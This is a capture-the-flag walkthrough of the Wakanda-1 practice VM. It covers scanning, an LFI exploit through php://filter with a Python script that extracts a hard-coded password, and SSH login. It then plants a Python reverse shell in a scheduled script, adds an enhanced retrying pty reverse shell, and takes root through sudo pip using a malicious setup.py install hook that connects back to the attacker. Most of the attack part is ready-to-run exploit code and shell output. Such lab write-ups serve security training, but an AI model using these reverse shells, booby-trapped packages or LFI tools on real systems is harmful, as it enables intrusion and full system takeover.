First, download the wakanda-1 OVA from the site and import it (preferably into VirtualBox; importing it into VMware is more of a hassle). My Kali runs in VMware, so all that was needed was to put the target and Kali on the same network segment: I bridged both Kali and Wakanda to the same physical NIC.
From Kali, sweep the LAN for live hosts. Some people prefer nmap or a scripted ping sweep, but Kali's netdiscover does the job as well:
root@kali:~# netdiscover -i eth0
This finds the target at 192.168.0.137.
Next, check which ports are open (a full-range SYN scan):
root@kali:~# nmap -sS -p- 192.168.0.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 23:16 CST
Nmap scan report for Wakanda1 (192.168.0.137)
Host is up (0.00060s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes
35322/tcp open unknown
MAC Address: 08:00:27:3C:1E:DB (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
root@kali:~#
Port 3333 is really SSH; nmap prints dec-notes only because that is the name listed for 3333 in its services table, since no -sV fingerprinting was done. Port 80 is open, so start with the website.
Viewing the page source, a comment gives a hint:
That suggests LFI. Using the php://filter wrapper, build a payload that makes the include return the source of index.php base64-encoded instead of executing it.
Paste the result into Burp's Decoder to recover the source:
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
?>
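To make the LFI step concrete, here is an added example (my code, not the writeup's or the VulnHub author's). It models the vulnerable include() in Python so it runs offline: build_lfi_payload() produces the ?lang= value, simulate_vulnerable_include() stands in for the target and returns what the server would send, and extract_password() pulls the credential out of the decoded source. FAKE_WEBROOT is a constructed stand-in containing only the index.php source shown above; fetch_source() applies the same flow to a live URL and assumes the ?lang= layout of this target.

```python
import base64
import re

# Constructed stand-in for the target's web root: only the index.php
# source shown in the writeup, nothing else.
FAKE_WEBROOT = {
    "index.php": '''<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
?>''',
}

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="


def build_lfi_payload(resource):
    """Value to send as ?lang=. The script appends ".php" itself, so the
    resource is given WITHOUT the extension: resource=index ends up as
    resource=index.php after concatenation."""
    return FILTER_PREFIX + resource


def simulate_vulnerable_include(lang, webroot=FAKE_WEBROOT):
    """Toy model of include($_GET['lang'].".php"), returning the body the
    server would send. The filter wrapper base64-encodes the file instead
    of executing it, which is why the source leaks. A plain filename is
    included and executed, so its source never appears in the response."""
    path = lang + ".php"
    if path.startswith(FILTER_PREFIX):
        target = path[len(FILTER_PREFIX):]
        src = webroot.get(target)
        if src is None:
            return ""  # PHP warns and includes nothing; modelled as empty
        return base64.b64encode(src.encode()).decode()
    if path in webroot:
        return "(%s executed; source not disclosed)" % path
    return ""


def decode_leaked_source(body):
    """Reverse the convert.base64-encode filter (stray whitespace ignored)."""
    return base64.b64decode(body).decode()


def extract_password(php_source):
    """Pull the hard-coded $password literal out of the recovered source."""
    m = re.search(r'\$password\s*=\s*"([^"]*)"', php_source)
    return m.group(1) if m else None


def fetch_source(base_url, resource, timeout=5):
    """Same flow against a real target; assumes <base_url>?lang=<payload>."""
    from urllib.parse import quote
    from urllib.request import urlopen
    url = base_url + "?lang=" + quote(build_lfi_payload(resource), safe=":/=")
    with urlopen(url, timeout=timeout) as r:
        return decode_leaked_source(r.read().decode())


if __name__ == "__main__":
    body = simulate_vulnerable_include(build_lfi_payload("index"))
    print(decode_leaked_source(body))
    print("password:", extract_password(decode_leaked_source(body)))
```

php://filter works even with allow_url_include off, because it is a local stream wrapper rather than a remote one; the appended ".php" only restricts which files can be read, not whether the wrapper is honoured.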
There is a password in it, so try SSH. The page earlier said made by mamadou, so use that as the username (SSH is on 3333, as found above).
root@kali:~# ssh mamadou@192.168.0.137 -p 3333
mamadou@192.168.0.137's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 10:29:35 2020 from kali
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
What we land in is a Python prompt rather than a shell, so escape to a terminal via os.system as shown. In mamadou's home directory is flag1.txt.
Reading /etc/passwd shows another user, devops.
So look for files belonging to that user that might be abused:
Two suspicious files turn up, .antivirus.py and /tmp/test, both with very recent timestamps; most importantly, .antivirus.py is writable by users other than its owner. Look at its contents:
mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
Combined with the fresh timestamp, this means the script is being run on a schedule, so the natural move is to edit it and get a shell as devops.
Another way to find it is to grep for /tmp/test once that file has been noticed:
mamadou@Wakanda1:/$ grep -r '/tmp/test' / 2>/dev/null
Binary file proc/1284/task/1284/cmdline matches
Binary file proc/1284/cmdline matches
srv/.antivirus.py:open('/tmp/test','w').write('test')
usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.py: url = 'file:///tmp/test_package_index'
Binary file usr/lib/python2.7/dist-packages/setuptools/tests/test_packageindex.pyc matches
That also leads to .antivirus.py.
Put a reverse shell into .antivirus.py and listen on port 1234 on Kali. Replace 192.168.0.186 with your own Kali address; the addresses in the captures below differ from this one, so substitute yours throughout.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.186",1234))        # Kali listener
os.dup2(s.fileno(),0)                    # stdin, stdout, stderr -> socket
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])    # runs as whoever executes the scheduled job
root@kali:~# nc -nvvlp 1234
listening on [any] 1234 ...
connect to [192.168.0.137] from localhost [192.168.0.106] 60823
bash: cannot set terminal process group (1107): Inappropriate ioctl for device
bash: no job control in this shell
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
So we get a devops shell as soon as the job fires next; flag2.txt is in devops's home directory.
sudo -l shows that devops may run pip as root without a password. pip executes a package's setup.py while installing it, so a package with a malicious install hook yields a root shell.
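The payload above dies if the listener is not up when the job fires, and the shell it gives has no TTY (hence the "no job control in this shell" message). Here is an added, more robust variant, my code rather than the writeup's, that retries the connection and runs bash under a pseudo-terminal. The same connect-and-dup2 pattern is what the pip exploit's install hook uses later, so it serves there too. It runs on Python 2.7 (the target's interpreter) and on Python 3; the Kali address and port in __main__ are placeholders to change, and start_local_listener() is only a constructed fixture for exercising connect_with_retry() on loopback.

```python
import os
import pty
import socket
import time


def connect_with_retry(host, port, attempts=5, delay=1.0, timeout=2.0):
    """Try to reach the listener up to `attempts` times, sleeping `delay`
    seconds between tries. Returns a connected socket, or None when every
    attempt fails (listener not yet started, port filtered, etc.)."""
    for _ in range(attempts):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            s.settimeout(None)  # back to blocking for the interactive shell
            return s
        except (OSError, socket.error):  # socket.error is not OSError on Python 2
            s.close()
            time.sleep(delay)
    return None


def spawn_shell(sock, shell="/bin/bash"):
    """Wire the socket to stdin/stdout/stderr, then run the shell under a
    pseudo-terminal: bash gets a controlling tty, so job control, prompts
    and Ctrl-C work, unlike a bare subprocess.call(["/bin/bash", "-i"]).
    pty.spawn relays between fd 0/1 (now the socket) and the pty master."""
    for fd in (0, 1, 2):
        os.dup2(sock.fileno(), fd)
    os.environ["TERM"] = "xterm"
    pty.spawn([shell, "-i"])


def start_local_listener():
    """Constructed fixture: a listening socket on an ephemeral loopback port,
    used only to demonstrate connect_with_retry() without a second host."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


if __name__ == "__main__":
    # Placeholders: your Kali address and the port nc is listening on.
    s = connect_with_retry("192.168.0.186", 1234, attempts=10, delay=3.0)
    if s is not None:
        spawn_shell(s)
```

Drop the file in as /srv/.antivirus.py (keeping the original open('/tmp/test', ...) line if you want the job to look untouched) and start nc before the next run; with the retry loop the ordering no longer matters within the retry window.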
$ sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
Here I borrow an exploit someone else wrote (Werner's FakePip):
from setuptools import setup
from setuptools.command.install import install
import os,socket,subprocess

class CustomInstall(install):
    def run(self):
        install.run(self)
        # pip runs this hook as root under sudo: reverse shell back to Kali
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("192.168.0.186",14580))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        p=subprocess.call(["/bin/sh","-i"])

setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/werneror',
      author='Werner',
      author_email='me@werner.wiki',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
Change the IP and port so the shell comes back to Kali. I wrote the file on Kali and served it with a simple HTTP server (python3 -m http.server works); download it onto the target into a directory of its own (here /tmp/pip2), then run pip there as root:
$ sudo pip install . --upgrade --force-reinstall
Unpacking /tmp/pip2
Running setup.py (path:/tmp/pip-CarpRr-build/setup.py) egg_info for package from file:///tmp/pip2
Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
Kali, listening on port 14580, receives a root shell. Done!
Two articles were referenced while working through this machine: